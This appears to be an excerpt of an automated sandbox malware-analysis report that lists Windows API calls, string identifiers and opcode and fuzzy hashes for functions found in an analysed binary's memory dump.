                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                              • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                              • Opcode ID: 29310b9a0882c245a3268a1c01178a57515d63b1d1bea32f34902aeaf17408c4
                                                                                                                                                                                                                                                                              • Instruction ID: 1cd0cb6ab78f9f56779f05d4bff312af70f2a0a6c9679372f88d4270e26ab4be
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29310b9a0882c245a3268a1c01178a57515d63b1d1bea32f34902aeaf17408c4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC411772C1022DABCF21EBA4DC95DEEB779BF04750F504069EA01A31A0EB759E08CB54
                                                                                                                                                                                                                                                                              Function 00784A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00784AD9
                                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00784AE0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00784AF3
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00784AFB
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00784B06
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00784B10
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00784B1A
                                                                                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00784B30
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00784B3C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                              • Opcode ID: 45f92aae14868f2a22fc42494e72f5268a6efbf5e0357f5be81a78b37b2add73
                                                                                                                                                                                                                                                                              • Instruction ID: cddfa286ffdb47fc5d568fd49d2b65ade39d2a07a9204c392e24f2788e4afb45
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45f92aae14868f2a22fc42494e72f5268a6efbf5e0357f5be81a78b37b2add73
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83318E72180219BBDF21AFA4CC08FDA3BA9FF09364F114215FA14A61E0C779DC10DB98
                                                                                                                                                                                                                                                                              Function 0077468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 007746B9
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 007746E7
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 007746F1
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077478A
                                                                                                                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0077480E
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00774932
                                                                                                                                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0077496B
                                                                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,00790B64,?), ref: 0077498A
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0077499D
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00774A21
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00774A35
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 429561992-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2d64658f695398760ebbae21672881d01b68839bbc9efd4683f3aa0e6b15ff30
                                                                                                                                                                                                                                                                              • Instruction ID: 86aaa11a86700a9a038ca37395840c0f0ef24896d5766f9dd68d95af5038690d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d64658f695398760ebbae21672881d01b68839bbc9efd4683f3aa0e6b15ff30
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAC146B16043059FCB00DF68C88492BB7E9FF89798F10891DF9899B251DB35ED05CB92
                                                                                                                                                                                                                                                                              Function 007684DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00768538
                                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007685D4
                                                                                                                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 007685E8
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CD4,00000000,00000001,007B7E8C,?), ref: 00768634
                                                                                                                                                                                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007686B9
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00768711
                                                                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0076879C
                                                                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007687BF
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 007687C6
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0076881B
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00768821
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0f4f04ccdb2a93f69381fee12981af65702bed316dff1bef44ce63b4525fa21e
                                                                                                                                                                                                                                                                              • Instruction ID: 3caf15b85823ea6e701e61b45c416fd6e254d86654a57d74ffed1d5454480a41
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f4f04ccdb2a93f69381fee12981af65702bed316dff1bef44ce63b4525fa21e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C12B75A00109AFCB54DFA4C888DAEBBF5FF48314B148198F91ADB262DB34ED45CB91
                                                                                                                                                                                                                                                                              Function 00750378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075039F
                                                                                                                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 007503F8
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0075040A
                                                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0075042A
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0075047D
                                                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00750491
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007504A6
                                                                                                                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 007504B3
                                                                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007504BC
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007504CE
                                                                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007504D9
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                              • Opcode ID: fa028facce082b7bfc21de05d79d35130ea136b54fcf75599fbe5642bada7e13
                                                                                                                                                                                                                                                                              • Instruction ID: 701a29e2001a74e03538da7dcb204735d9e3c1eec21430b0cb0a0f4147981cd7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa028facce082b7bfc21de05d79d35130ea136b54fcf75599fbe5642bada7e13
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67417F75A00259DFCB10DFA4D8489EE7BB9FF08355F108029ED09A7261CB78AD45CB90
                                                                                                                                                                                                                                                                              Function 0075A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075A65D
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 0075A6DE
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 0075A6F9
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 0075A713
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 0075A728
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 0075A740
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0075A752
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0075A76A
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0075A77C
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 0075A794
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 0075A7A6
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                                                                                              • Opcode ID: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                                                                                                                                                                                                                                                              • Instruction ID: 8e83f278c3e79f546dafdc13a894897b217062ba951cfaa72149c3e25019a4be
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41B2745047CA7DFF31966088047E5BEB0AB25355F08866ADDC64A1C2EBDC9DCC8BA3
                                                                                                                                                                                                                                                                              Function 00779730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                              • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                              • Opcode ID: 76783ce3e887d0ee27ced3c0b1ea982e9897f3d6a9bee777bb4234fad5d39727
                                                                                                                                                                                                                                                                              • Instruction ID: 64623eb08253793aa8e51f7459952ea83c36655c3e5700997e144c468464dc48
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76783ce3e887d0ee27ced3c0b1ea982e9897f3d6a9bee777bb4234fad5d39727
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51D631A011169BCF14DF6CC9519FEB3A5BF653A0B20822DEA2AE7284D739DD40C7D1
                                                                                                                                                                                                                                                                              Function 00774189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32 ref: 007741D1
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 007741DC
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00790B44,?), ref: 00774236
                                                                                                                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 007742A9
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00774341
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00774393
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                              • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                              • Opcode ID: 88c1f184c7eece1da2a6fcbbdc44e25fb1b4113722e72d97e1f0282f70f68520
                                                                                                                                                                                                                                                                              • Instruction ID: f1443d47e527f913d1817f8d05df078c68d201adeb4672bf6dbf3252a9bfea14
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88c1f184c7eece1da2a6fcbbdc44e25fb1b4113722e72d97e1f0282f70f68520
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF61A071608701DFCB10DF64C888F6ABBE8BF49754F108949F98997292C778ED44CB92
                                                                                                                                                                                                                                                                              Function 00768BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00768C9C
                                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00768CAC
                                                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00768CB8
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768D55
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768D69
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768D9B
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768DD1
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768DDA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: cbd9600842a6d025351b4d6f977b9c05596d01195e95ded5a10b79f1b71ce132
                                                                                                                                                                                                                                                                              • Instruction ID: 9790ca770289fda374b19148617b3e67c2dfc5abd0048ba2fa48a546ab67a825
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd9600842a6d025351b4d6f977b9c05596d01195e95ded5a10b79f1b71ce132
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0618D725043099FCB50EF20C8449AEB3E9FF89320F04495DF98AC7291DB39E945CBA6
                                                                                                                                                                                                                                                                              Function 007846E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateMenu.USER32 ref: 00784715
                                                                                                                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00784724
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007847AC
                                                                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 007847C0
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 007847CA
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007847F7
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 007847FF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                                                                                                                              • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                              • Opcode ID: 86f411e01351aff91451f5aaa71d4ef899be798345521688dac93887b1467c2f
                                                                                                                                                                                                                                                                              • Instruction ID: 40dfeb8a758392a3099b1eb253b70a95c5ec0a5816d68354ace3b99e32e801ff
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f411e01351aff91451f5aaa71d4ef899be798345521688dac93887b1467c2f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB417A75A0120AEFDB24EF64D848EAA7BB5FF09314F14802DFA45A7390D7B8AD10CB54
                                                                                                                                                                                                                                                                              Function 0075282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007528B1
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 007528BC
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007528D8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528DB
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 007528E4
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 007528F8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528FB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
